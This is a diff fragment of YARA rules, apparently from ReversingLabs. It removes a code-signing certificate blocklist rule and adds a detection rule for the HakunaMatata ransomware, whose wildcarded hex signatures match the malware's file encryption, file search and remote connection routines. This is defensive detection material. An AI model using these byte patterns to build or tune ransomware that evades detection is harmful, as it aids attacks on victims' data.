"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/ransomware/Win32.Ransomware.HakunaMatata.yara#L1-L373" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "e363ff93fce286d60a3f5ea20ba3ec03564b7a5321c3f6448cc82187f23e8a9f" score = 75 quality = 90 - tags = "INFO, FILE" + tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "INFO" + category = "MALWARE" + tc_detection_type = "Ransomware" + tc_detection_name = "HakunaMatata" + tc_detection_factor = 5 importance = 25 - condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VESNA, OOO" and (pe.signatures[i].serial=="00:e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e" or pe.signatures[i].serial=="e5:ad:42:c5:09:a7:c2:46:05:53:0d:35:83:2c:09:1e") and 1600786458<=pe.signatures[i].not_after) -} -import "pe" - -rule REVERSINGLABS_Cert_Blocklist_8E3D89C682F7C0Dad70110Cb7B7C8263 : INFO FILE -{ - meta: - description = "Certificate used for digitally signing malware." - author = "ReversingLabs" - id = "1adc776c-1549-5149-bd2f-81920a8d7255" - date = "2023-11-08" - modified = "2023-11-08" - reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L5712-L5730" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "a0f42c5492469e7f132b000aead2d674fed4ea9c0e168579fd55a6c89b45ae4d" - score = 75 - quality = 90 - tags = "INFO, FILE" - status = "RELEASED" - sharing = "TLP:WHITE" - category = "INFO" - importance = 25 + strings: + $encrypt_files = { + 55 89 E5 57 56 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? + 85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8D 55 ?? 89 14 24 89 C1 E8 ?? + ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? + ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 + 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? + ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B + 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? + C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 + EC ?? 85 C0 0F 95 C0 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B + 45 ?? 8B 40 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 89 54 24 + ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? + 01 D0 01 C0 89 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? + ?? 8D 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 + A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? + ?? ?? ?? 8B 45 ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? + 39 C8 76 ?? 89 C8 89 DA 89 45 ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? + 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? + 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 + 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C6 8B 45 ?? 89 C1 BB + ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 CF 31 C7 89 7D ?? 89 DF 31 D7 89 7D ?? 8B 45 ?? 0B + 45 ?? 85 C0 0F 94 C0 0F B6 C8 8B 55 ?? 8B 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 + F0 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 14 24 + A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 + 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? C7 44 24 ?? ?? ?? ?? ?? + 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 + 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? + 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? + ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 F6 ?? 89 75 ?? 89 D0 80 F4 ?? 89 + 45 ?? 8B 55 ?? 8B 4D ?? 89 C8 09 D0 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? + 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? + 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B 45 ?? 89 + 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? + ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 + EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5F 5D C2 + } + $encrypt_files_2 = { + 55 89 E5 56 53 81 EC ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 89 85 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 85 C0 0F 84 ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 8B 55 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? 84 C0 0F 84 ?? + ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 + 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF + D0 83 EC ?? 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 89 + 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 C0 84 C0 0F 84 + ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? + ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 55 ?? 89 45 ?? 89 55 ?? + 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C3 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 C6 89 F0 09 D8 85 C0 + 74 ?? 8B 45 ?? 8B 55 ?? 3B 95 ?? ?? ?? ?? 72 ?? 3B 95 ?? ?? ?? ?? 77 ?? 3B 85 ?? ?? + ?? ?? 76 ?? 8B 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? + 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B 55 ?? 89 44 24 ?? C7 44 24 ?? + ?? ?? ?? ?? 89 14 24 E8 ?? ?? ?? ?? 8B 45 ?? 8B 50 ?? 89 D0 C1 E0 ?? 01 D0 01 C0 89 + 45 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 + 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? + FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 + ?? 8B 40 ?? BA ?? ?? ?? ?? 8B 4D ?? 8B 5D ?? 39 DA 72 ?? 39 DA 77 ?? 39 C8 76 ?? 89 + C8 89 DA 89 45 ?? 8B 4D ?? 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 + 4C 24 ?? 89 54 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 + C0 84 C0 0F 84 ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 8B 45 ?? 89 4C 24 ?? 89 54 24 ?? 89 04 + 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? + 89 CE 31 C6 89 B5 ?? ?? ?? ?? 89 DE 31 D6 89 B5 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 + ?? ?? ?? ?? 89 D8 09 F0 85 C0 0F 94 C0 88 45 ?? 8B 55 ?? 0F B6 4D ?? 8B 5D ?? 8B 45 + ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 4C 24 ?? + C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 89 45 ?? A1 ?? ?? ?? + ?? FF D0 89 45 ?? 8B 45 ?? 85 C0 79 ?? C7 45 ?? ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 4D ?? + 8B 55 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 89 4C 24 ?? 89 54 24 ?? 8B 45 + ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? + ?? ?? 90 EB ?? 8B 4D ?? 8B 5D ?? 8B 45 ?? BA ?? ?? ?? ?? 29 C1 19 D3 89 C8 89 DA 89 + 45 ?? 89 55 ?? 8B 45 ?? BA ?? ?? ?? ?? 01 45 ?? 11 55 ?? 8B 45 ?? 8B 55 ?? 89 C6 83 + F6 ?? 89 B5 ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? 8B B5 ?? + ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 85 ?? ?? ?? + ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 80 F4 ?? 89 85 ?? ?? ?? ?? 8B 9D ?? + ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 55 ?? 2B + 45 ?? 1B 55 ?? 89 45 ?? 89 55 ?? 8B 45 ?? 8B 40 ?? 89 C1 BB ?? ?? ?? ?? 8B 45 ?? 8B + 55 ?? 39 D3 72 ?? 39 D3 77 ?? 39 C1 76 ?? 89 C1 89 D3 89 4D ?? 8B 45 ?? C7 44 24 ?? + ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8B 55 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? 89 04 24 + A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 F8 ?? 0F 94 C0 84 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 8B + 45 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 4D ?? 89 4C 24 ?? 89 54 24 ?? 89 44 24 ?? 8B 45 ?? + 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 94 C0 84 C0 74 ?? C7 45 ?? ?? ?? ?? + ?? EB ?? 8B 45 ?? 8B 55 ?? 8B 4D ?? BB ?? ?? ?? ?? 29 C8 19 DA 89 45 ?? 89 55 ?? 8B + 45 ?? 8B 55 ?? 89 C3 80 F7 ?? 89 9D ?? ?? ?? ?? 89 D0 80 F4 ?? 89 85 ?? ?? ?? ?? 8B + 9D ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 89 F0 09 D8 85 C0 74 ?? E9 ?? ?? ?? ?? C7 45 ?? ?? + ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? + 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 8B + 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 45 ?? 89 04 24 E8 + ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? + FF D0 83 EC ?? 8B 45 ?? 8D 65 ?? 5B 5E 5D C2 + } + $search_files = { + E8 ?? ?? ?? ?? 83 EC ?? 85 C0 0F 95 C0 88 45 ?? 80 7D ?? ?? 74 ?? C7 44 24 ?? ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? + 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 83 45 ?? ?? EB ?? A1 ?? + ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 + 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? ?? ?? 83 EC + ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 + ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 89 + C1 E8 ?? ?? ?? ?? 8B 5D ?? 85 DB 74 ?? 89 D9 E8 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + 89 1C 24 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 04 24 E8 + ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 8D 85 ?? ?? ?? ?? 89 C1 + E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 90 8D 85 + ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 85 C0 0F 95 + C0 84 C0 74 ?? E9 ?? ?? ?? ?? A1 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 ?? ?? + ?? ?? A1 ?? ?? ?? ?? FF D0 89 C3 C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? + ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? 89 1C 24 89 C1 E8 ?? ?? + ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? + ?? ?? 89 04 24 E8 ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 + 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 45 + ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC ?? 83 7D ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 05 ?? + ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 74 ?? B8 ?? ?? ?? ?? EB ?? B8 ?? ?? ?? ?? 84 C0 + 74 ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 89 C2 8B 85 ?? ?? ?? ?? 89 14 24 89 C1 + E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? + 89 C2 8B 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 + ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 EC ?? C7 44 24 ?? + ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 + } + $search_files_2 = { + FF 15 ?? ?? ?? ?? EB ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? FF 15 ?? ?? ?? + ?? 89 C3 C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B 50 ?? 81 C2 ?? ?? ?? ?? 8B 42 ?? + 83 E0 ?? 83 C8 ?? 89 42 ?? 89 1C 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 C3 8B + 00 89 DA 03 50 ?? 8B 42 ?? 83 E0 ?? 83 C8 ?? 89 42 ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? + ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 1C 24 E8 ?? ?? + ?? ?? 89 C1 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? + ?? 83 EC ?? 83 BD ?? ?? ?? ?? ?? 74 ?? 83 BB ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? + 89 04 24 89 D9 E8 ?? ?? ?? ?? 83 EC ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 + ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 + 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 ?? ?? + ?? ?? C7 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 04 + 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 B9 ?? ?? ?? ?? E8 ?? ?? ?? + ?? 83 EC ?? 89 04 24 E8 ?? ?? ?? ?? 89 C1 E8 + } + $remote_connection = { + 55 89 E5 53 81 EC ?? ?? ?? ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 + 45 ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 89 45 ?? 8B 45 ?? 89 44 24 ?? C7 + 04 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F0 ?? 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 + ?? ?? ?? ?? 8B 45 ?? 8B 00 89 45 ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 44 24 ?? 8D 45 + ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? + 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 89 45 ?? 83 7D ?? ?? 74 ?? 81 7D ?? ?? ?? + ?? ?? 75 ?? 8B 45 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 39 45 ?? 77 ?? 8D 45 ?? + 89 C1 E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 8D 45 ?? 8D 4D ?? 89 4C 24 ?? 89 14 24 89 C1 E8 + ?? ?? ?? ?? 83 EC ?? 8D 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 ?? ?? ?? ?? 83 EC + ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 83 45 ?? ?? 83 45 ?? + ?? EB ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? 81 7D ?? ?? ?? ?? ?? 75 ?? E9 ?? + ?? ?? ?? 8D 45 ?? 83 C0 ?? 89 C1 E8 ?? ?? ?? ?? 85 C0 0F 95 C0 84 C0 74 ?? 8B 45 ?? + 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8B 45 ?? 8D 50 ?? 8D 45 ?? 89 04 24 89 D1 E8 + ?? ?? ?? ?? 83 EC ?? 8B 45 ?? 05 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 90 8D 45 ?? 89 + C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 + C1 E8 ?? ?? ?? ?? EB ?? 89 C3 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 89 D8 89 04 24 E8 ?? ?? + ?? ?? 90 8B 5D ?? C9 C2 + } + $remote_connection_2 = { + 55 89 E5 57 56 53 83 EC ?? 89 4D ?? 8B 5D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 89 45 ?? 89 44 24 ?? C7 04 24 ?? ?? + ?? ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? + ?? C7 45 ?? ?? ?? ?? ?? 8B 03 89 45 ?? EB ?? 83 EC ?? 89 45 ?? 85 C0 74 ?? 3D ?? ?? + ?? ?? 74 ?? 81 7D ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? 8D 45 ?? 89 + 44 24 ?? 8D 45 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8D 45 ?? 89 44 24 ?? C7 44 24 + ?? ?? ?? ?? ?? 8B 45 ?? 89 04 24 E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 45 ?? 83 7D ?? ?? + 74 ?? BE ?? ?? ?? ?? 8D 7D ?? EB ?? 83 EC ?? 8D 45 ?? 89 04 24 8D 4D ?? E8 ?? ?? ?? + ?? 83 EC ?? 8B 45 ?? 39 F8 74 ?? 89 04 24 E8 ?? ?? ?? ?? 83 C6 ?? 39 75 ?? 72 ?? 8B + 45 ?? 8B 5C B0 ?? 89 7D ?? B8 ?? ?? ?? ?? 85 DB 74 ?? 89 1C 24 E8 ?? ?? ?? ?? 8D 04 + 43 C6 44 24 ?? ?? 89 44 24 ?? 89 1C 24 8D 4D ?? E8 ?? ?? ?? ?? EB ?? 8B 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 83 EC ?? E9 ?? ?? ?? ?? 8B 45 ?? 2B 45 ?? C1 F8 ?? 69 C0 ?? ?? ?? + ?? 85 C0 74 ?? 8B 7D ?? 8D 9F ?? ?? ?? ?? 89 1C 24 E8 ?? ?? ?? ?? 8B 47 ?? 3B 47 ?? + 74 ?? 85 C0 74 ?? 8B 55 ?? 89 10 8D 48 ?? 8D 45 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC ?? + 8B 45 ?? 83 40 ?? ?? 89 1C 24 E8 ?? ?? ?? ?? EB ?? 8B 4D ?? 83 C1 ?? 8D 45 ?? 89 04 + 24 E8 ?? ?? ?? ?? 83 EC ?? EB ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C2 + } + $encrypt_files_3 = { + 55 57 56 53 83 EC ?? 8B 41 ?? 85 C0 75 ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? + ?? BE ?? ?? ?? ?? 89 F0 83 C4 ?? 5B 5E 5F 5D C2 ?? ?? 89 CB C7 44 24 ?? ?? ?? ?? ?? + 8D 54 24 ?? 89 54 24 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 FF + 15 ?? ?? ?? ?? 83 EC ?? 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? + C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? + ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C7 BE ?? ?? + ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? + ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C2 89 44 24 ?? + 83 F8 ?? 74 ?? 8D 44 24 ?? 89 44 24 ?? 89 14 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 C6 85 + C0 75 ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 89 3C 24 FF 15 ?? ?? ?? ?? + 83 EC ?? 8B 44 24 ?? 89 04 24 FF 15 ?? ?? ?? ?? 83 EC ?? 85 F6 0F 84 ?? ?? ?? ?? 8B + 84 24 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 + 44 24 ?? ?? ?? ?? ?? 8B 44 24 ?? 8B 54 24 ?? 89 44 24 ?? 89 54 24 ?? 8B 43 ?? 89 04 + 24 E8 ?? ?? ?? ?? 89 44 24 ?? 8B 73 ?? 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 04 24 + E8 ?? ?? ?? ?? 8D 04 B6 01 C0 89 44 24 ?? 89 04 24 E8 ?? ?? ?? ?? 89 C5 C7 44 24 ?? + ?? ?? ?? ?? 8D 44 24 ?? 89 44 24 ?? C7 44 24 ?? ?? ?? ?? ?? 8B 84 24 ?? ?? ?? ?? 89 + 44 24 ?? 89 3C 24 FF 15 ?? ?? ?? ?? 83 EC 